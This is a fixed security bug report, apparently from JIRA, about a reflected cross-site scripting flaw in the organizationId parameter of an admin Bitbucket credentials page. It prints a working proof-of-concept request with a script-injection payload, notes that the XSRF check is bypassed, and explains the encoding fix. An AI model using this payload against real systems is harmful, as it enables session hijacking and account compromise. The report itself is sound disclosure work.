- Type: Bug
- Resolution: Fixed
- Priority: High
- Component/s: None
- 7.5
The organizationId parameter is reflected unencoded into a hidden input on the results page. Its contents survive the "missing XSRF token" retry screen, so the XSRF check does not block the attack and exploitation is trivial: the victim only has to click on the link.
GET /secure/admin/UpdateBitbucketCredentials.jspa?organizationId="><script>javascript:alert(1)</script>&adminPasswordUp=5543%21%25tinfoil_secret&userNAMEUp=tinfoil_NAME&atl_token=BYRO-9FU9-UCXC-E6R7%7C1abd1e4580f1776e7c4a257414640e59c92fc1b0%7Clin&atl_token_retry_button=Retry+Operation
Response:
<h2>Update Bitbucket Password</h2> <input type="hidden" name="atl_token" value="BYRO-9FU9-UCXC-E6R7|1abd1e4580f1776e7c4a257414640e59c92fc1b0|lin"> <input type="hidden" id="organizationId" name="organizationId" value=""><script>javascript:alert(1)</script>" /> <fieldset>
The value lands inside a double-quoted HTML attribute, so a single `"` is enough to close the attribute and the following `>` closes the tag, after which the rest of the input is parsed as HTML. The field therefore needs to be output-encoded for the HTML attribute context as well as the HTML body context: the quote characters (`"` and `'`) and `<`, `>` and `&` all have to be turned into entities before the value is written into the page.
See fixing HOWTO at https://extranet.atlassian.com/display/SECCOUNCIL/HOWTO+-+Fixing+JIRA+Security+Issues